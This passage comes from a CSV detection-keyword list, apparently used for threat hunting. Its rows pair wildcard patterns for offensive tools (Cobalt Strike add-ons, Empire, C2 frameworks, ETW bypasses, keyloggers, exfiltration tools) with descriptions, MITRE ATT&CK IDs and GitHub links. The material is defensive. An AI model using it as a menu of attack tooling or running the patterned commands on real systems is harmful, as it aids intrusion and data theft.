Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*FtpC2.exe*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z" +"*FtpC2.Tasks*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z" +"*ftp-server -u * -P * -p 2121*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ftshell -*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" +"*ftshell.v3*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" +"*ftype *findstr *dfil*","greyware_tool_keyword","ftype","will return the file type information for file types that include the string dfil - hidden objectif is to find cmdfile string","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ftype *findstr *SHCm*","greyware_tool_keyword","ftype","will return the file type information for file types that include the string SHCm - hidden objectif is to find SHCmdFile string","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ftype *findstr dfil*","greyware_tool_keyword","ftype","will return the file type information for file types that include the string dfil - hidden objectif is to find cmdfile string","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ftype *findstr SHCm*","greyware_tool_keyword","ftype","will return the file type information for file types that include the string SHCm - hidden objectif is to find SHCmdFile string","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Fuck-Etw-main*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*fucksetuptools*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*FuckThatPacker.*","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","10","10","612","91","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" +"*FudgeC2.*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*FudgeC2Viewer.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*fuff *-input-shell*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*fuff *-scraperfile*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*fuff *-scrapers*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*FULLSHADE/WindowsExploitationResources*","offensive_tool_keyword","WindowsExploitationResources","Resources for Windows exploit development","T1203 - T1210 - T1212 - T1216 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/FULLSHADE/WindowsExploitationResources","1","1","N/A","N/A","10","1351","319","2021-12-20T00:21:07Z","2020-05-26T07:19:54Z" +"*func_get_powershell_dll*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*func_install_wine_dotnettojscript*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*function psenum*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*function Use-Zeus*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*FunnyWolf/pystinger*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" +"*fuse_evil.*","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","41","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" +"*fuse_lowlevel.h*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" +"*fuxploider --url * --not-regex ""wrong file type""*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*fuxploider*","offensive_tool_keyword","fuxploider","Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.","T1526 - T1505 - T1506 - T1574","TA0006 - TA0008","N/A","N/A","Web Attacks","https://github.com/almandin/fuxploider","1","0","N/A","N/A","10","2668","485","2023-04-16T19:57:12Z","2017-07-14T09:30:06Z" +"*fuzz_option.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*fuzzdb*","offensive_tool_keyword","fuzzdb","FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. Its the first and most comprehensive open dictionary of fault injection patterns. predictable resource locations. and regex for matching server responses.","T1190 - T1191 - T1192 - T1193 - T1197","TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/fuzzdb-project/fuzzdb","1","0","N/A","N/A","10","7640","2093","2023-02-21T15:21:06Z","2015-09-10T17:54:31Z" +"*fuzzfactory.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*fuzzrequest.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*FuzzySecurity/Dendrobate*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*FuzzySecurity/Sharp-Suite*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*fw_walk disable*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" +"*g_hookedSleep.*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" +"*g0h4n/RDE1*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*g0h4n/REC2*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*G0ldenGunSec/GetWebDAVStatus*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" +"*g0tmi1k*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/g0tmi1k","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*g3tsyst3m/undertheradar*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*gabriellandau/PPLFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*GadgetToJScript.csproj*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" +"*GadgetToJScript.exe -a *","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","0","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" +"*GadgetToJScript.sln*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" +"*GadgetToJScript-master*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" +"*Gality369/CS-Loader*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*GateTrampolin.asm*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*gateway-finder*","offensive_tool_keyword","gateway-finder-imp","This is an improved version of original Gateway-finder. New version rebuilt with python3 and support for files with MACs/IPs The homepage of original project is: http://pentestmonkey.net/tools/gateway-finder Gateway-finder is a scapy script that will help you determine which of the systems on the local LAN has IP forwarding enabled and which can reach the Internet.","T1016 - T1049 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Data Exfiltration","https://github.com/whitel1st/gateway-finder-imp","1","0","N/A","N/A","1","57","7","2020-12-14T09:52:29Z","2018-04-18T12:43:11Z" +"*gather/keylogger*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*gather/ldap_query*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*gather/peass.rb*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 